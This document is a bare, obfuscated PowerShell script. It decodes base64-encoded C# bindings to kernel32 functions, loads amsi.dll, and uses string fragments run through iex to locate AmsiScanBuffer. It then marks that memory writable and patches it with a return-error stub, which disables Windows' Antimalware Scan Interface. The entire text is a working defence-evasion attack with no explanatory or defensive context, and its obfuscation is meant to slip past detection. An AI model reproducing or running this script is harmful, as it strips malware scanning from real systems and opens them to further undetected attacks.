$a = "dQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsACgAKAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAAcgBmAGMAIAB7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABJAG4AdABQAHQAcgAgAGgATQBvAGQAdQBsAGUALAAgAHMAdAByAGkAbgBnACAAcAByAG8AYwBOAGEAbQBlACkAOwAKAAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAATABvAGEAZABMAGkAYgByAGEAcgB5ACgAcwB0AHIAaQBuAGcAIABuAGEAbQBlACkAOwAKAAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwAKAAoAfQA="
$n32 = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($a))
Add-Type $n32

$lib = [rfc]::LoadLibrary("a"+"msi."+"dll")
$crTsY='$add ='
$rs7YE=' [rf'
$6gxWV='c]::'
$B2LlK='GetP'
$oOzYJ='rocA'
$Eul4a='ddre'
$fFZF6='ss($'
$feU3Y='lib, "'
$l85Lm='Amsi'
$7iaxa='" + '
$FsvsB='"Sca'
$wWAXt='n" +'
$dXTWH=' "Bu'
$30L6A='ffer'
$IZwnY='")'
iex($crTsY + $rs7YE + $6gxWV + $B2LlK + $oOzYJ + $Eul4a + $fFZF6 + $feU3Y + $l85Lm + $7iaxa + $FsvsB + $wWAXt + $dXTWH + $30L6A + $IZwnY)

$p = 0 
[rfc]::VirtualProtect($add, [uint32]5, 0x40, [ref]$p)
$pat = [Byte[]] (184, 87, 0, 7, 128, 195)

$RngSX='[Sys'
$S4XcK='tem.'
$o6z5I='Runt'
$MEYXN='ime.'
$bdsw4='Inte'
$pCEf1='ropS'
$uULGn='ervi'
$6w7ER='ces.'
$8Ipw5='Mars'
$ekxGx='hal]'
$BbJ1b='::Co'
$zbnSc='py($'
$Xr3sj='pat, '
$KzKQb='0, $'
$JmMTO='add, 6)'
($RngSX + $S4XcK + $o6z5I + $MEYXN + $bdsw4 + $pCEf1 + $uULGn + $6w7ER + $8Ipw5 + $ekxGx + $BbJ1b + $zbnSc + $Xr3sj + $KzKQb + $JmMTO) | iex
